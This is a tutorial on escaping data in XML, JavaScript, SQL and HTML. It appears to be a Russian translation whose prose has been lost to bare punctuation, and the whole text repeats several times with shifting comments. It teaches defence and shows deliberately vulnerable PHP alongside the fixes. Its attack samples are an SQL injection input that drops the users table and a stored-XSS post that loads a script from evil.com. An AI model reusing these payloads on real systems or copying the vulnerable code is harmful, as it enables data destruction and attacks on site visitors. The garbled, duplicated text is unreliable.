<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .
Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
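// Prepared statement: the SQL text is sent first and the user value is bound separately,
// so the value is never parsed as SQL and needs no escaping.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() expects an array with one value per "?" placeholder;
// passing the bare string is a type error, so the value is wrapped in an array.
$stmt->execute(array($_POST['name']));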
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
<!-- Deliberately not well-formed: the raw "<" in "x < n" inside <contents> starts a tag, so an XML parser rejects the document. In text content "<" must be written as &lt; (and "&" as &amp;); ">" is conventionally written as &gt;. -->
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
// Author and body as plain JavaScript string literals; the apostrophe in "don't" is harmless inside double quotes.
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
// Unlike XML, "<" and ">" have no special meaning inside a JavaScript string literal, so this needs no escaping.
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
// Deliberately broken: the unescaped inner double quote after "said " terminates the string literal, so the rest of the line is a syntax error.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
// Fixed: the inner quotes are escaped as \" so they stay part of the literal; a literal backslash must in turn be written as \\.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
// A fixed query string: safe only because no user-controlled data is concatenated into it.
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// VULNERABLE: $name comes straight from the request and is interpolated into the SQL text unescaped,
// so a single quote in the input ends the literal and whatever follows is run as SQL (SQL injection).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php /* VULNERABLE: username and body are echoed into HTML without htmlspecialchars(), so markup in a post body is rendered as markup instead of text (stored XSS). */ ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escapes the characters MySQL treats specially inside a string literal (quotes, backslash, NUL, line breaks)
// so a quote in user input can no longer terminate the literal. It escapes according to the current
// connection charset, so that charset must be set first (mysql_set_charset()). ext/mysql itself was
// deprecated in PHP 5.5 and removed in PHP 7.0; prepared statements are the lasting fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
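<?php /* Escaped output: htmlspecialchars() turns <, >, & and quotes into entities, so a post body containing markup is shown as text instead of being rendered. Flags are explicit: ENT_QUOTES also encodes single quotes (the same call then stays safe inside quoted attributes) and 'UTF-8' pins the charset instead of relying on the PHP-version-dependent default. */ ?>
<div class="post">
  <p class="meta">
    Posted by <?php echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8'); ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>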
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .
Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
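// Prepared statement: the SQL text is sent first and the user value is bound separately,
// so the value is never parsed as SQL and needs no escaping.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() expects an array with one value per "?" placeholder;
// passing the bare string is a type error, so the value is wrapped in an array.
$stmt->execute(array($_POST['name']));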
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
<!-- Deliberately not well-formed: the raw "<" in "x < n" inside <contents> starts a tag, so an XML parser rejects the document. In text content "<" must be written as &lt; (and "&" as &amp;); ">" is conventionally written as &gt;. -->
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
// Author and body as plain JavaScript string literals; the apostrophe in "don't" is harmless inside double quotes.
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
// Unlike XML, "<" and ">" have no special meaning inside a JavaScript string literal, so this needs no escaping.
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
// Deliberately broken: the unescaped inner double quote after "said " terminates the string literal, so the rest of the line is a syntax error.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
// Fixed: the inner quotes are escaped as \" so they stay part of the literal; a literal backslash must in turn be written as \\.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
// A fixed query string: safe only because no user-controlled data is concatenated into it.
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// VULNERABLE: $name comes straight from the request and is interpolated into the SQL text unescaped,
// so a single quote in the input ends the literal and whatever follows is run as SQL (SQL injection).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php /* VULNERABLE: username and body are echoed into HTML without htmlspecialchars(), so markup in a post body is rendered as markup instead of text (stored XSS). */ ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escapes the characters MySQL treats specially inside a string literal (quotes, backslash, NUL, line breaks)
// so a quote in user input can no longer terminate the literal. It escapes according to the current
// connection charset, so that charset must be set first (mysql_set_charset()). ext/mysql itself was
// deprecated in PHP 5.5 and removed in PHP 7.0; prepared statements are the lasting fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
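<?php /* Escaped output: htmlspecialchars() turns <, >, & and quotes into entities, so a post body containing markup is shown as text instead of being rendered. Flags are explicit: ENT_QUOTES also encodes single quotes (the same call then stays safe inside quoted attributes) and 'UTF-8' pins the charset instead of relying on the PHP-version-dependent default. */ ?>
<div class="post">
  <p class="meta">
    Posted by <?php echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8'); ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>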
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .
Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
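// Prepared statement: the SQL text is sent first and the user value is bound separately,
// so the value is never parsed as SQL and needs no escaping.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() expects an array with one value per "?" placeholder;
// passing the bare string is a type error, so the value is wrapped in an array.
$stmt->execute(array($_POST['name']));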
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
<!-- Deliberately not well-formed: the raw "<" in "x < n" inside <contents> starts a tag, so an XML parser rejects the document. In text content "<" must be written as &lt; (and "&" as &amp;); ">" is conventionally written as &gt;. -->
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
// Two plain string literals; neither contains a character that needs escaping.
var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
var name = "Homo Sapiens";
- " " . :
// "<" and ">" are ordinary characters inside a JavaScript string literal, so no escaping is needed here.
var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
var name = "Homo Sapiens";
! ! , , , -?
// Does not parse: the unescaped inner double quote after "said " closes the string literal early,
// so the rest of the line is read as code.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
// Escaped form: each inner quote is written as \" so it is part of the data, not a delimiter.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
-- Static lookup: the literal 'Alex' is fixed in the statement text, so there is no untrusted input here.
SELECT u.phone_number
  FROM users AS u
 WHERE u.name = 'Alex'
, . , SQL . , :
// The query text is a fixed string; mysql_query() (removed in PHP 7) sends it to the server as-is.
$sql = "SELECT phone_number FROM users WHERE name = 'Alex'";
$result = mysql_query($sql);
, . "", , , , . , - .
, , -, . , :
// SQL injection: $name comes straight from the request and is interpolated into the statement
// unescaped, so a quote in the submitted value ends the string literal and whatever follows is
// executed as SQL. Use a prepared statement with a bound parameter instead (mysql_* was removed in PHP 7).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
-- A value with no quote characters interpolates cleanly.
SELECT u.phone_number
  FROM users AS u
 WHERE u.name = 'Alex'
Mc'Donalds
-- Syntax error: the apostrophe in Mc'Donalds ends the string literal after 'Mc', leaving
-- Donalds' as stray tokens. Harmless by itself, but it shows the submitted quote is interpreted as SQL.
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
-- Injected input: 'Joe' closes the literal, "; DROP TABLE users;" becomes a second statement
-- (executed where the driver allows multiple statements), and the trailing "--" comments out the
-- dangling quote so the whole thing parses.
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<!-- Stored XSS: username and body are echoed without htmlspecialchars(), so any markup a user
     submitted becomes part of the page for everyone who views it. -->
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<!-- Rendered post: plain text, including the double quotes, is displayed exactly as submitted. -->
<div class="post">
  <p class="meta"> Posted by Plato on January 2, 15:31 </p>
  <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p>
</div>
, , , , :
<!-- Rendered post: the body is ordinary text, so the raw "<" and ">" are shown as characters. -->
<div class="post">
  <p class="meta"> Posted by Pascal on November 23, 04:12 </p>
  <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p>
</div>
... . , , , ?
<!-- Stored XSS: the post body was inserted as markup, so this is a real script element and the
     browser loads and runs dangerous.js for every visitor who views the page. -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// mysql_real_escape_string() backslash-escapes quote characters so the value stays inside the
// '...' literal. It needs an open mysql connection, only protects a value that is quoted in the
// query, and the mysql_* functions were removed in PHP 7: prefer a prepared statement with a
// bound parameter.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
-- Plain value: nothing in 'Alex' needed escaping, so the statement is unchanged.
SELECT u.phone_number
  FROM users AS u
 WHERE u.name = 'Alex'
Mc'Donalds
-- The apostrophe is now \' , a literal character inside the string, so the lookup is for the
-- name Mc'Donalds and the statement parses.
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
-- Escaped: \' keeps the whole submitted value inside one string literal, so the text
-- "; DROP TABLE users; --" is part of the name being searched for, not a second statement.
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<!-- htmlspecialchars() turns <, >, & and " into entities, so user data is displayed as text rather
     than parsed as markup. That is the right encoder for element content and double-quoted
     attributes; single quotes are left alone unless ENT_QUOTES is passed (the default only since
     PHP 8.1), and JavaScript or URL contexts need their own encoding. -->
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
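<!-- Output of the escaped template: htmlspecialchars() replaced <, >, and " with entities, so the
     browser shows the script tag as literal text and no script element exists. (The page had
     rendered the entities back into raw markup, which made this indistinguishable from the
     vulnerable output above.) -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>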
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
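// Prepared statement: the SQL text with a placeholder is sent first and the value is bound
// separately, so the database never parses user input as SQL. PDOStatement::execute() takes an
// array of parameter values, one per placeholder; passing the bare string is a wrong call.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);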
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <!-- Not well-formed as written: the raw "<" inside <contents> starts a tag, so a parser rejects the document. It must be written as &lt; (and ">" conventionally as &gt;). --> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
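<!-- Output of the escaped template: htmlspecialchars() replaced <, >, and " with entities, so the
     browser shows the script tag as literal text and no script element exists. (The page had
     rendered the entities back into raw markup, which made this indistinguishable from the
     vulnerable output above.) -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>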
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
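// Prepared statement: the SQL text with a placeholder is sent first and the value is bound
// separately, so the database never parses user input as SQL. PDOStatement::execute() takes an
// array of parameter values, one per placeholder; passing the bare string is a wrong call.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);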
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <!-- Not well-formed as written: the raw "<" inside <contents> starts a tag, so a parser rejects the document. It must be written as &lt; (and ">" conventionally as &gt;). --> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
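<!-- Output of the escaped template: htmlspecialchars() replaced <, >, and " with entities, so the
     browser shows the script tag as literal text and no script element exists. (The page had
     rendered the entities back into raw markup, which made this indistinguishable from the
     vulnerable output above.) -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>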
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
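// Prepared statement: the SQL text with a placeholder is sent first and the value is bound
// separately, so the database never parses user input as SQL. PDOStatement::execute() takes an
// array of parameter values, one per placeholder; passing the bare string is a wrong call.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);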
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <!-- Not well-formed as written: the raw "<" inside <contents> starts a tag, so a parser rejects the document. It must be written as &lt; (and ">" conventionally as &gt;). --> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
